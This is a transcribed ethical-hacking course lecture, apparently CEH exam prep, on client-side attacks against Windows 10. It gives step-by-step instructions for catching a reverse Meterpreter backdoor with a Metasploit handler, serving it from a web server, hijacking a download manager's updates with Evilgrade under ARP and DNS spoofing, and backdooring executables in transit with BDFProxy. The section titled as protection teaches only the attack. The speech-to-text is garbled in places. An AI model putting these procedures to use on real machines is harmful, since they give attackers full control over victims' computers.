EC Council CEH 312-50 V11 Topic: Gaining Access – Client Side Attacks Part 2
December 19, 2022

5. Using A Basic Delivery Method To Test The Backdoor & Hack Windows 10

Now the backdoor that we created uses a reverse payload. So, like I said before, it does not open a port on the target computer. It actually connects from the target computer to our computer. And by doing that, it will bypass firewalls and look less suspicious. So for this to work, we need to open a port in our computer so that the back door can connect from the target computer to us on that port. So if you remember, when I created the backdoor, I set the port to 80 80. So I need to open that port in my CAL machines so that when the target person executes the back door, the back door can connect back to me on port 8080. So I’m just going to write the name of the payload that we used because that’s very important when you’re listening for incoming connections. So we used a payload that’s written in Go, and that was a meterpreter rev Https, which is a reverse Https payload. Now this is not a command; I’m just going to write it in here.

So just keep this in mind. And we used port 80 for the reverse connection. So these are the most important things to keep in mind when listening for income and connections. So I’m going to split the screen, and I’m going to listen for income and connections in here. And to do that, I’m going to use the Metasploit framework. All you have to do now to run Metasploit is launch MSF console. Now, the Metasploit Framework is a huge framework for penetration testing. So the Meterpreter backdoor or the Meterpreter payload that will create it for us is actually programmed by the people who made Metasploit. That’s why we’re using Metasploit to listen for incoming connections. So Velvetion actually uses Metasploit to generate the backdoor that we chose in the previous video. So to listen for incoming connections, we’re going to use a module in Metasploit. Now Metasploit, as I said, is a huge framework with a lot of modules. So the module that we’re interested in is a module that allows us to listen for incoming connections from a meterpreter payload. To use that module, we’re going to use a module, and then we’re going to specify the module name.

And the module name is “exploit multi handler.” Okay, so the command we’re using is used to specify the module that we want to use. And we’re using a module called Exploit Multi Handler that allows us to listen for incoming connections. I’m going to hit Enter, and I was already in that module. So you can see that nothing changed for me. But for you, you should navigate to that module. And I’m going to do “show options” to see the options that I can set for this module. and you can see that you can specify different options for it. The most important thing that you want to specify is the payload. So you can see in here that for me, it’s set to Windows meterpreter reverse TCP. And if you remember what we used, we used a meterpreter to reverse HTTP, not TCP. You want to change this. The first part is fine because our target is going to be Windows. But you want to change reverse TCP to reverse HTTP. And you can change that exactly the same way that we did with Ville Évasion. So you type in “set,” and you put the option name that you want to change.

And we want to change the option for the payload. So we’re going to say payload, and we’re going to set that to Windows Meterpreter reverse Https this time. OK, so we’re setting an option. We’re setting the payload to Windows Meterpreter reverse HTTP. This payload should now correspond to the payload you selected in the back door. So we used meterpreter reverse HTTP in the back door. That’s why here we’re using reverse HTTP as well. If you chose reverse HTTP, then set this to reverse HTTP. If you use reverse TCP, then set this to reverse TCP, and so on. So I’m going to hit enter for this, and that’s going to do it for me. And if I do show options now, you’ll see the payload changed to Windows meterpreter reverse HTTP. Now, the same concept applies to all the other options. So you’d like to change the LHOST to our IP address. And you can see that this is already set to the right one. So, if it was incorrect for you, all you had to do was set LHOST and enter your IP address. So you can get the IP address using ifconfig, like I showed you in the previous lecture. So for me, it’s 1020, 1413, 213. And again, this is the same IP that I used when I created my backdoor.

And the same goes for the port. You want to set the same port. So we’re going to set Lport to 80, because that’s the port that we used when we generated the backdoor. So again, the main idea with this is that you want to set the payload, the LHOST, and the port to exactly the same options that you chose when you created the back door. Once we’re done with that, we’re going to do show options one more time, and you’ll see that I have my payload set properly, Windows Meterpreter reverse Https, my LHOST, and my LPORT. and all of that is done properly. So now all we have to do is exploit. And now Metasploit is waiting for connections, as you can see on port 8080 and on my IP address, which is 10 (2014 to 13). So now, if anybody opens the back door that we created in the previous lecture, because it’s a reverse back door, the back door will try to connect to the IP that we set when we created the back door, which was 1020-14 to 13, and it’ll try to connect on port 8080. It’s going to come to this computer. And this computer is already waiting for that connection from this multi-handler module. So the connection will be established, and then I’ll be able to control the target computer and, basically, hack it and have full control over it. Now, In, I’ll show you a very simple method for delivering the back door to the target computer, as well as how to test the back door and ensure that it works properly. 

6. Hacking Windows 10 Using Fake Update

Now we’re ready to receive connections from our backdoor. So we created the backdoor, we set a payload, and we’re listening for incoming connections here from any connection that comes in from the same backdoor, on the same port, on the same IP. So now if a person runs that backdoor, they will receive the connection back here on this computer. What we’ll do now is test the backdoor to make sure it works. And to do that, we’re going to use a very basic delivery method. Later on in the course, we’re going to talk about smart delivery methods that will trick the person into opening the file that we’re sending to them. For now, we’re just doing a very basic example to test our very basic backdoor. So to do that, we’re just going to put the back door on our web server and then download it from the target computer. So there’s nothing smart about this.

And you probably won’t be able to deliver the letter to a real person this way. So we’re only doing this for testing to make sure our back door works. So Kali comes in with a web server. And what that means is, basically, that you can use Kali as a website. So what we’re going to do is put that backdoor on that website, and then just download it from the target Windows machine. Now, the website directory where you should store the website files is varw HTML. So I’ll show you where it is. Now, if you just click in here on the path and then put a forward slash, it will allow you to manually type the path that you want to go to. So you want to go to VAR at www.html. And this is the location where the website files are stored. Now, for you, you’ll probably only have index HTML. You won’t have all of that stuff, but that’s just stuff that I created while I was testing a few things. So the index is the main page that people usually see when they browse to this website. So what I’m going to do here is, first of all, create a directory, which I’m going to call Evil Files. So every time we create a backdoor or a keylogger, we’re going to put it here and then download it to the Windows machine to test it. And again, later on in the delivery methods section, we’re going to talk about smart delivery methods. For now, we’re only going to be creating the evil files and testing them to make sure that they work as expected.

So I’m going to call this directory EvilFiles, and inside it I’m going to put the backdoor that we created before. So Ville Evasion was used to create the backdoor that we created. And Ville Évasion actually gave us the full path of it when we created it, if you remember. Or you can go back now to the lecture and have a look at it. So I’m just going to press CTRL T to open a new tab. And then again, I’m going to click on the path in here, and I’m going to put a forward slash to manually enter the path. And then we’re going to go to VAR libvilleevasion output compiled, hit Enter, and you’ll see the back door that I created right here and named Rev https 80 80. So I’m going to copy this and paste it in here. And that’s it. Now we can download this file from the website that Kali uses that Kali has. Now to start the web server. To start the website, we have to start its service from the command prompt. And to do that, we’re going to do Service Apache 2 Start.

So the command is service. To start the service, Apache 2 is the name of the web server. And then we want to start this web server. I’m going to hit enter. And because we didn’t get any errors, that means the command got executed properly. Now everything is done. So the IP of the Kali machine was 1020, 14 to 13. It’s the same IP that we’re listening to here, and it’s the same IP that you’d get if you ran ifconfig. So I’m going to go to my Windows machine and I’m going to navigate to my IP address for the Kali machine, which is 1020-14-13. And this will open the basic index HTML that I showed you, and it basically just says that it works, telling us that the web server is working and the website is working. This is all contained within varw HTML. So if I wanted to go to the directory where we put the backdoor, then we’re just going to go to the evil files because we called them evil files. I’m going to hit Enter, and you can see the back door that we created in the previous lecture, and we called it Rev https:80/. So if I click on that, it’s going to download it for me. And like I said before, this is not the smartest way to deliver the backdoor, but right now, all we want to do is test the backdoor and make sure that it works.

So if I click on the downloads and run the backdoor, it’s going to tell me that this is an executable. So be careful when you run it. But this is not detecting a virus. It’s literally just saying, “Be careful when you run exe.” I’m going to run it anyway. And once we come back here, you’ll see that we received a connection from the target machine. So we didn’t connect to the target computer. The target computer connected back to us. So you can see the IP of the target computer, which is 1020-14-06. That IP connected back to us on port 8080 right here. So basically, now we have full control over that computer. Right here, you can see that we have a meterpreter session. And what Meterpreter allows us to do is literally anything that the user can do on their computer. So we’ll see how we can use the meterpreter later on in the post-connection attacks. For now, we can see that the back door is working, and if we do sysinfo, you can see that we are inside the Microsoft Edge Windows 10 machine. It’s Windows 10 right here. It’s x 64.It employs US English and meterpreter X86 for Windows. So, as I said, now we can do anything we want on the target machine, and we’ll talk about how to use the meterpreter later on in the post connection section. But again, basically right now, we have hacked the target computer and have full control over it.

7. Backdooring Downloads on The Fly to Hack Windows 10

Previously, we learned how to create an undetectable backdoor, which is great, but we delivered this backdoor by simply downloading it on the target computer. Now, this will probably not work in real life. Your target will never just download an executable and run it if you ask them to do that. As a result, in this lecture, I’d like to demonstrate a better delivery method in which we will proof and update. So when a specific programme on the target computer checks for updates, it will say that there is an update. And when they install that update, they will actually be installing a backdoor. The only limitation to this method is that you need to be the man in the middle. It doesn’t matter how, but you need to be able to intercept the connections.

So you can do this using ARP spoofing or a fake access point, as I showed you before, or using any other method that will allow you to intercept the connections. Usually, programmes have a specific domain that they use to check for updates. So let’s say we have the user here that has a specific program and wants to update something. It will send a request to a specific domain. And let’s say this domain is updateserver.com. This will be sent to the DNS server. The DNS server will respond with the IP of the update server, which we have right here. And then the user will send a direct request to the update server looking for updates. If there are updates, then the update server will respond with the updates.

Now, if we’re demanding the middle, if we’re able to intercept all the requests and responses, then when we get a request for updateserver.com, instead of giving the IP of the update server, we can actually give the IP of a hacker server. This server is running a special programme called “Evil Grade.” And Evil Grade will tell the user that yes, there is an update, but instead of serving the actual update, it will serve them a backdoor. So when the user agrees to install this update, they’ll actually be installing a backdoor on their system. Let’s do this practically, and it will become even clearer. Right here, I have my Kali machine. This is the custom image that I made for this course. Therefore, it has an evil grade preinstalled in it. So first, we’ll need to navigate to the location where it’s installed. We’re going to use the CD command to do that, and it is installed in Opt Evilgrade. And then to run the binary, the programme itself, we’re going to do a forward slash against evil. Now, using Evilgrade is very simple and very similar to Metasploit. So, to get a list of all the programmes whose updates we can hijack, we’ll run show modules. And as you can see, you have a lot of famous programmes such as Windzip, VMware, Skype, Safari, and so on. Now we’re going to be doing this with a programme called DAP Download Accelerator Plus.

So we have it here. So to configure a specific module, all we have to do is just type configure module name, which is DAP, so you can replace DAP with any module that you want to configure with any programme that you want to hijack. So I’ll hit enter, and as you can see, I’m now inside the DAP module, and I’ll do show options to see all of the options that I can configure. So as you can see, we get a list of all the options that we can set, and the main option that we want to change is the agent. This is the path to the programme that will be installed as an update. So in our case, we’re going to be replacing this with the backdoor that we created in the previous lecture. To change this option, we’ll set the agent’s option name to the location where I have my backdoor, which is envar www HTML backdoorexe, as you can see, the format of changing options is very similar to better cap and metasploit.

We set, followed by the option that we want to change, followed by the value. So I’m going to hit enter, and that’s done. The next thing that I want to modify is the end site, which is the website that will be loaded once the update is successful. Now that I know this will return a “not found” error, that’s why I’m going to change it. You don’t have to change it with every module. To change this, we’ll just go to doset and site, and I’ll just set it to the basic domain, which is speedbit.com. And finally, before we run everything, I’m going to show options one last time to make sure that everything is set as I want it. So I have the agent set to varw HTMLbackdoor exe; that’s perfect, and I have the endsite set to the way I want it. So I’m ready to go. And all we need to do now is just type “start” to start the evil grade. So right now, if evil grade gets a request for an update, it will say yes, there is an update, and it will serve the backdoor exe as the update. The only problem is that it will never get any requests right now because I am not intercepting connections. I’m still not the man in the middle. Therefore, we’re going to become the man in the middle using BetterCap.

Like I said, you can use any method you want to create demand in the middle, but we’re just going to do it using ARP spoofing right now. So I’m going to use Bettercap using the exact same command that we’ve been using before. So we’re just doing Bettercap, connecting it to the network, and passing it the spoof capt. so that it runs an ARP spoofing attack, putting me in the middle of the connections. I’m going to hit enter, and this will run without errors. So that’s perfect. We also need to use Bettercap to run an DN-spoofing attack and spoof any request to update speedbit.com. This is the domain that the target programme uses to check for updates. And we want to spoof DNS requests to this so that they return the IP address of the Kylie machine, which is running Evil grade. So the evil grade gives them the fake update. Now, I covered how to do DNS spoofing in detail in a full lecture before. So if you don’t remember how this works, please go back and revise this lecture because I’m going to do it a little bit quickly right now. So I’ll copy this domain and clear the screen here, and we’ll set the DNSspoof all to true, as well as the DNSspoof domains to the domain that we want to spoof. Finally, we’ll begin the DNS poofer by typing DNS poofer on and perfect.

Now it’s working, and it’s telling us that it’s going to spoof any request to updatespeedbit.com to the IP of mykali machine. The IP of the Mykali machine is running Evilgrade. Evilgrade will say, “Yes, there is a new update,” and it will serve them through the back door that we have right here. And that way, the back door will be automatically executed on the target computer. The only problem is that the backdoor will get executed. But we’re not listening for incoming connections here, so we won’t really get access. Therefore, we need to listen for incoming connections using Metasploit, as I showed you before. Now, I’ve already configured my multi-handler. Again, I covered this in detail, so if you don’t remember how to do it, please go back to that lecture right now. I’m just going to show you the options that I set right here. And you can see that I am using a Windows monitor to reverse HTTP here because I’m actually using a different backdoor in my evil grade. This backdoor is not a reverse HTTP as demonstrated in previous lectures.

It’s actually a reverse HTTP backdoor because, for some reason, I noticed the HTTP backdoors are not working with the evil grade. That’s why I created a reverse HTTP backdoor specifically for this lecture. So I’m setting my payload to the same payload that’s used in my backdoor. I’m setting my IP in here, and I’m setting the output to 80 80. So everything is perfect. I’m going to run an exploit to listen for incoming connections, and now we’re ready to go. So now let’s go over this one more time when we go to the Target computer and check for updates. Right now this computer is intercepting connections because of better capping, and it’s also going to spoof any request for updating speedbit.com to this IP. This is the IP where Evil Grade is working. Evil Grade is going to say, “Yes, there is a new update.” The update is this executable. The target computer will run this executable. It will run it because it thinks it’s an update. When this gets executed, it will send a connection to us in our multi-handler. So let’s go to the target computer and see if this will actually work as we expected. So I’ve already downloaded and installed the programme that we’re trying to hijack its updates and installed it.So I’m just going to double-click it to start the program. Now it’s just asking me to set it as the default download manager.

I’m going to say no, and I’m going to go to Help, and I’m going to click on Update. Now we’re going to say yes. Check for updates, please. I’m just going to uncheck this. Click on “next.” It’s checking for updates now, and it’s telling us that there is a new update. So we’re going to say “next.” And it’s telling us right here that this is a critical update. So I’ll be like, “Yeah, I want to install this.” This will download the update for me and install it. and it’s telling us that it’s done. Everything is done. We’re going to say “next,” “thank you very much,” and “finish.” When we return to the cali machine, we can see that we have a reverse connection from the target. And, just to be sure, we can do this information to see more information and make it perfect. As you can see, we’re inside the target computer, and now we have full access to that computer and can do whatever the normal user can do on their system. Now I will talk more about post-exploitation and how to control the computer using this meterpreter access in the post-exploitation section. But right now we’ve managed to hack into a computer using a fake update.

8. How to Protect Yourself From The Discussed Delivery Methods

In this lecture, I want to show you another backdoor delivery method. In this method, we’re going to wait for our target to download an executable, and we’ll backdoor this executable as it’s being downloaded. So when they run their executable, they will get the file that they’re expecting, but at the same time, a backdoor will run in the background, given that we have full access to their computer. The only limitation to this is that you need to be the man in the middle. It doesn’t matter how you manage to achieve this position, but you need to be able to intercept connections so you can backdoor the downloads on the fly. Now to do this, we’re going to be using a tool called Backdoor Factory Proxy.

I already installed this tool for you in the custom image that I made for this course. So all we have to do is go to our Kali machine right here and navigate to the location where I installed it. To navigate to a specific location, you can either just click in here and press the forward slash from your keyboard to open the pathbar, or you can press CTRL and L from your keyboard again to open the pathbar. Once this is open, we need to go to the path where this tool is installed, and it’s installed in optbdfroxy. In here, you have the actual executable of the programme and the configuration file. So I’m going to double-click the configuration file to change the configuration. And the main thing that you want to change here is the proxy mode, which we have right here. It will be set to regular by default, and you want to change that to transparent. The next thing that we want to modify is the IP of my current computer because, like I said, this tool will backdoor every file the target downloads. So we need to tell this tool my IP address so that the back door knows where to connect when it is executed on the target computer. So, as I previously demonstrated, you can obtain your IP address by running ifconfig; I’ve already done so and know my IP range is 100 to 15.

So I’m going to look in here for where it says Windows. This is the configuration for the Linux targets. If you are targeting Linux, then you also want to modify the IP here. But I’m only going to be targeting Windows. So I’m going to look for Windows, as you can see in this screenshot. And I’m going to change the host to my IP, which is 100 to 15, and I’m also going to scroll down to change it for Windows 64. And again, in here, you want to set it to 100 instead of 15, and we’re good to go. So I’m going to control S to save and control Q to quit, and we are ready to use the tool. So keep in mind the tool is installed as BDF Proxy, and the programme that runs the tool is this file right here, BDF Proxy PY. Therefore, we’re going to go to our terminal and navigate to where the tool is installed. So we’re going to do a CD-opt BDF proxy. I’m going to hit enter. And if I do a quick LS, you’ll see we have the programme file in here, and because you see this in green, it means it’s an executable. So we can run it by doing a forward slash followed by the file name, which is “Bdfproxy PY.” I’m going to hit Enter, and this will run without errors. So it’s perfect. So this programme right now is running on its own, and as soon as it receives a request for an exe, it’s going to backdoor that executable. But the way it is right now, it’s not going to receive any requests.

 Therefore, we need to redirect requests to it. To accomplish this, we must first become demand in the middle. And like I said, you can do this using ARP spoofing. You can do it by using a fake access point and targeting the clients that connect you, or you can use this tool whenever you manage to become the man in the middle. Regardless of how you manage to do this, I’m going to do it with ARP spoofing because it’s the easiest. So we’re going to use Bettercap exactly the same way that we’ve been using it before. So we’re giving it the interface, which is 880, and then I’m giving it my ARP spoofing caplet so that it puts me in the middle of the connections, allowing me to intercept data and modify it on the fly. So I’m going to hit enter. This will run without issues. So it’s perfect. So now I’m intercepting the data, and whenever this Windows machine, which is the target, tries to download something, it’ll be intercepted in BetterCap. But BDF Proxy is still not able to see that there is a download because these are two separate programs. So what we want to do is link all the data that this programme sees to this programme right here.

And to do so, we’ll use IP tables, a firewall that comes preinstalled on most Linux systems. And using IP tables, we can specify rules that packets have to follow. So I’m going to clear my screen here and I’m going to use IP tables to modify a table called Nat and append a pre-routing rule that will apply for TCP packets that are going to a destination port of 80. And we want to redirect this to port 80, where we have BDF Proxy running and waiting to backdoor the downloads. So, this is a very simple command. We’re using a programme called IP Tables to modify a table called Nat. We’re going to apply a pre-routing rule that will apply for TCP packets that are going to destination port 80, and we’re going to redirect them to port 80, where we have this programme BDFProxy running, waiting to backdoor files for me. So I’m going to hit enter, and I misspelt port. In here there’s an R, and this runs without errors. So that’s perfect. So now we’re using Bettercap to intercept data. All this data is going to be redirected using this rule to BDF Proxy, which will wait and see if there is an exe being downloaded. It will backdoor it and then serve it back to the target. When the target executes the exe, they’ll execute a backdoor that will send a connection back to me. So all I have to do right now is to listen for incoming connections. And, as I previously demonstrated, you can accomplish this using the multi handler. Or if you’re lazy, you can actually use the source file that the backdoor factory creates for us.

So this file will automatically start the multi handler and listen for incoming connections for all of the payloads that we saw in the BDF proxy’s configuration file. To run this, all we have to do is first of all run MSF Console as usual, and we’re going to say, “I want to give you a resource file,” and then give it the full path for this resource file. Remember that this file was created by BDF Proxy and is stored in the opt BDF proxy. As a result, the file’s location will be in opt BDF Proxy, followed by the file name. So if I hit enter now, MSF Console will run, and it will load all the code that is stored in the resource file, which will automatically start the multi handler and configure it with the IPS that we specified when we configured BDF Proxy. So now everything is running smoothly, and we are ready to go. So let’s go to the target computer, and let’s keep it simple when testing. So I’m going to try to download something from an HTTP website. So we’re going to go to Speedbit.com, and we’re just going to click on “Download.” This will actually download the DAP, which I showed you how to hijack for its updates. You’ll get a normal download. We’re going to save it to our downloads. This will automatically go to downloads. So I have that already open in here. As you can see, it has a proper icon for the program. This is the normal icon that you’ll get if you download Speed Bit. And if you double-click it and run it, it’s just an executable.

You will actually get the normal installer. So if this was an actual person, they wouldn’t really get suspicious because they were reinstalling the programme that they wanted. What they don’t realise is that this programme was infected with backdoors as it was being downloaded. So if we go back to our Kali machine, you’ll see that Metasploit is saying that there is a new session opened. So all I have to do now is press Enter on my keyboard. Then I’m going to do sessions. to list all of the available sessions. And as you can see, we have a new session in here. And to enter into this session and interact with it, I’m going to do sessions. I followed the ID of this session, which is number one. And I’m inside my meterpreter session right now, inside the target computer. So to verify this, I’m going to do SysInfo. And as you can see, I’m inside the MS Edge right now, and I can control this machine and do anything the normal user can do on their computer. And like I said, I will show you how to control this computer remotely in the post-exploitation section. But for now, we have full access to that computer. And we managed to do this by backporting a file that the normal user had requested to download as that file was being downloaded.

Leave a Reply

How It Works

img
Step 1. Choose Exam
on ExamLabs
Download IT Exams Questions & Answers
img
Step 2. Open Exam with
Avanset Exam Simulator
Press here to download VCE Exam Simulator that simulates real exam environment
img
Step 3. Study
& Pass
IT Exams Anywhere, Anytime!